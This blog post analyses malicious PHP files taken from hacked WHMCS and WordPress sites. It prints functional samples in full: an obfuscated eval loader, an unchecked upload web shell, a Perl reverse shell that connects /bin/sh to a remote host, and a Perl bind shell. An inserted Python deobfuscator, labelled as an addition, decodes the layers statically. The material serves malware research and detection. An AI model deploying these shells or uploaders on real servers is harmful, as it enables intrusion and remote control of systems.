
Some interesting malicious PHP files

16 September 2013

Hello fellow internet citizens (and bots)

Here are some cool malicious PHP files I found in one hacked WHMCS installation and one hacked WordPress site.

Note #1: they are mostly not the result of one hack/hacker but of several.
Note #2: those are harmful files; running them on your computer is not advised, and they are supplied for research purposes only.

Here are the files: click here (the archive password is: infected).

The most interesting file is r.php (VirusTotal scan: 3/48); it is "WHMCS Killer" by rab3oun.

$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=18932;   // remembers its own path and line number for the loader below
eval(gzuncompress(base64_decode('eNplj8[REDACTED]gT47xDRfgD5Al8g')));
return;

The eval line decodes to:

$O000O0O00=fopen($OOO0O0O00,'rb');              // reopen the script itself
while(--$O00O00O00)fgets($O000O0O00,1024);      // skip the loader lines, using the __LINE__ saved above
fgets($O000O0O00,4096);
$OO00O00O0=gzuncompress(base64_decode(strtr(fread($O000O0O00,480),   // read the junk after the closing tag
'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));
eval($OO00O00O0);

It keeps reading the encoded junk that follows the closing PHP tag, and decodes it 4 times.
The decoded version (which is still hard to read :/) is included as r_DECODED.php, and surprisingly the encoded version is detected by 3 anti-virus engines while the original is not detected at all (0/46).
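To see what those four rounds amount to without executing anything, here is an added Python decoder (not code from the post or from the malware author) that reproduces the loader's strtr, base64 and gzuncompress steps statically and peels the layers off one by one instead of calling eval. It only handles the inline eval(gzuncompress(base64_decode(...))) wrapper shape, not the trick of reading the tail of the file itself; the alphabets are the ones quoted above, while the encode_layer helper and the harmless sample it wraps are constructed for this demo.

```python
import base64
import re
import zlib

# Alphabets quoted from the r.php loader above. PHP's two-string strtr() ignores the
# surplus chars of the longer string, so FROM_ALPHA's trailing '=' is never remapped.
FROM_ALPHA = "EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/="
TO_ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Both wrapper shapes from the post: plain base64_decode('...') or base64_decode(strtr(...)).
WRAPPER = re.compile(
    r"eval\(gzuncompress\(base64_decode\("
    r"(?:strtr\('([^']*)','([^']*)','([^']*)'\)|'([^']*)')\)\)\)")

def php_strtr(text, src, dst):
    """PHP strtr($text, $src, $dst): positional map over the shorter alphabet."""
    n = min(len(src), len(dst))
    return text.translate(str.maketrans(src[:n], dst[:n]))

def decode_layer(blob, src="", dst=""):
    """One layer, statically (no eval): strtr -> base64 -> gzuncompress (zlib framing)."""
    return zlib.decompress(base64.b64decode(php_strtr(blob, src, dst))).decode()

def peel(src, max_layers=10):
    """Every layer, outermost first, down to the first text that is not a wrapper."""
    layers = [src]
    for _ in range(max_layers):
        m = WRAPPER.search(layers[-1])
        if not m:
            break
        if m.group(4) is not None:  # plain base64 form (r.php's outer layer)
            layers.append(decode_layer(m.group(4)))
        else:                       # strtr-substituted form (the inner layers)
            layers.append(decode_layer(m.group(1), m.group(2), m.group(3)))
    return layers

def encode_layer(php_src, substitute=True):
    """Inverse of decode_layer; constructed here only to build the harmless sample below."""
    b64 = base64.b64encode(zlib.compress(php_src.encode())).decode()
    if not substitute:
        return "eval(gzuncompress(base64_decode('%s')));" % b64
    return "eval(gzuncompress(base64_decode(strtr('%s','%s','%s'))));" % (
        php_strtr(b64, TO_ALPHA, FROM_ALPHA), FROM_ALPHA, TO_ALPHA)

# Constructed sample: a harmless echo under three substituted layers and one plain
# outer layer, mirroring the four decoding rounds described for r.php.
INNER = "<?php echo 'hello'; ?>"
SAMPLE = encode_layer(encode_layer(encode_layer(INNER)))   # three inner rounds
SAMPLE = encode_layer(SAMPLE, substitute=False)            # plain outer round
```

Running peel() on a real sample stops at the first layer that is not this exact wrapper, which is the point where a manual look (or a different pattern) is needed.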

Next file is 825451_n2n.jpg (VirusTotal scan: 5/46), a nice shell that's obfuscated twice.
It originally looks like this:

<?php $_F=__FILE__;$_X='Pz48P3BocA0KNX1IDR[TOO_LONG]4NCg==';
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);print($_R);$_R=0;$_X=0;;?>

Decoding the second line gives:

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

Decoding it again (decoding $_X) yields a full-featured shell, included as 825451_n2n_DECODED.php (VirusTotal scan: 7/44).

Next file is b0x.php (VirusTotal scan: 0/47), a simple upload script that wasn't obfuscated.

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
// copies the upload next to the script under its original name, with no checks at all
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

Next file is index.php (VirusTotal scan: 16/48): WSO Shell v2.3 web shell by oRb; all custom function names start with WSO.
It's not entirely obfuscated, except for two chunks which are saved into a Perl script and executed.
#1 Back connect code $back_connect_p (decoded, included as bc.pl):

#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);

#2 Port binding script $bind_port_p (decoded, included as bp.pl):

#!/usr/bin/perl
$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
    accept(CONN,S);
    if(!($pid=fork)) {
        die "Cannot fork" if (!defined $pid);
        open STDIN,"<&CONN";
        open STDOUT,">&CONN";
        open STDERR,">&CONN";
        exec $SHELL || die print CONN "Cant execute $SHELL\n";
        close CONN;
        exit 0;
    }
}

Next file is index (2).php (VirusTotal scan: 26/47), a variant of the famous R57 shell (variant by SnIpEr_SA); also not obfuscated.

Next file is install.php (VirusTotal scan: 1/46); it's an obfuscated version of webadmin.php, which is a legitimate web admin/management script, but of course hackers abused it.
And I am not sure why he even obfuscated it; the clean version is also detected by one antivirus engine.

Next file is New.php (VirusTotal scan: 1/48), which is obfuscated.
It decodes to New_DECODED.php (VirusTotal scan: 28/45) and turns out to be another r57 shell variant (by tryag).

Next file is SaD.php (VirusTotal scan: 8/45), a normal PHP shell with nothing significant, but it's the first time I have seen it.

Next file is xx.php (VirusTotal scan: 6/46), a cPanel/FTP brute-forcing tool.

That’s it, enjoy!
